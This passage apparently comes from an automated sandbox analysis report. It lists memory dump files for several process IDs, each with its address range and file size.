                                                                                                          • memory/5496-287-0x00007FF8A39D0000-0x00007FF8A3FBE000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.9MB

                                                                                                          • memory/5496-190-0x00007FF8A39D0000-0x00007FF8A3FBE000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.9MB

                                                                                                          • memory/5496-267-0x00007FF8A5570000-0x00007FF8A568C000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.1MB

                                                                                                          • memory/5496-266-0x00007FF8A2970000-0x00007FF8A299D000-memory.dmp

                                                                                                            Filesize

                                                                                                            180KB

                                                                                                          • memory/5496-237-0x00007FF8A2A30000-0x00007FF8A2A49000-memory.dmp

                                                                                                            Filesize

                                                                                                            100KB

                                                                                                          • memory/5496-301-0x00007FF8A5570000-0x00007FF8A568C000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.1MB

                                                                                                          • memory/5496-228-0x00007FF8A2970000-0x00007FF8A299D000-memory.dmp

                                                                                                            Filesize

                                                                                                            180KB

                                                                                                          • memory/5496-230-0x00007FF8A2C00000-0x00007FF8A2C19000-memory.dmp

                                                                                                            Filesize

                                                                                                            100KB

                                                                                                          • memory/5496-241-0x00007FF8A39D0000-0x00007FF8A3FBE000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.9MB

                                                                                                          • memory/5496-235-0x00007FF89C810000-0x00007FF89C986000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/5496-233-0x00007FF8A1470000-0x00007FF8A1493000-memory.dmp

                                                                                                            Filesize

                                                                                                            140KB

                                                                                                          • memory/5496-242-0x00007FF8A1020000-0x00007FF8A1053000-memory.dmp

                                                                                                            Filesize

                                                                                                            204KB

                                                                                                          • memory/5496-245-0x00007FF89B9B0000-0x00007FF89BA7D000-memory.dmp

                                                                                                            Filesize

                                                                                                            820KB

                                                                                                          • memory/5496-244-0x00000200A3320000-0x00000200A3842000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.1MB

                                                                                                          • memory/5496-263-0x00007FF8A90C0000-0x00007FF8A90D4000-memory.dmp

                                                                                                            Filesize

                                                                                                            80KB

                                                                                                          • memory/5496-264-0x00007FF8A4F50000-0x00007FF8A4F74000-memory.dmp

                                                                                                            Filesize

                                                                                                            144KB

                                                                                                          • memory/5496-265-0x00007FF8B16B0000-0x00007FF8B16BD000-memory.dmp

                                                                                                            Filesize

                                                                                                            52KB

                                                                                                          • memory/5496-243-0x00007FF89A2A0000-0x00007FF89A7C2000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.1MB

                                                                                                          • memory/5496-307-0x00007FF8A2970000-0x00007FF8A299D000-memory.dmp

                                                                                                            Filesize

                                                                                                            180KB

                                                                                                          • memory/5496-308-0x00007FF8A2C00000-0x00007FF8A2C19000-memory.dmp

                                                                                                            Filesize

                                                                                                            100KB

                                                                                                          • memory/5496-306-0x00007FF8A93F0000-0x00007FF8A93FF000-memory.dmp

                                                                                                            Filesize

                                                                                                            60KB

                                                                                                          • memory/5496-305-0x00007FF8A4F50000-0x00007FF8A4F74000-memory.dmp

                                                                                                            Filesize

                                                                                                            144KB

                                                                                                          • memory/5496-304-0x00007FF8A1470000-0x00007FF8A1493000-memory.dmp

                                                                                                            Filesize

                                                                                                            140KB

                                                                                                          • memory/5496-303-0x00007FF89C810000-0x00007FF89C986000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/5496-302-0x00007FF8A90C0000-0x00007FF8A90D4000-memory.dmp

                                                                                                            Filesize

                                                                                                            80KB

                                                                                                          • memory/5496-200-0x00007FF8A4F50000-0x00007FF8A4F74000-memory.dmp

                                                                                                            Filesize

                                                                                                            144KB

                                                                                                          • memory/5796-213-0x0000029DECBF0000-0x0000029DECC12000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/6032-612-0x00007FF8A3B10000-0x00007FF8A40FE000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.9MB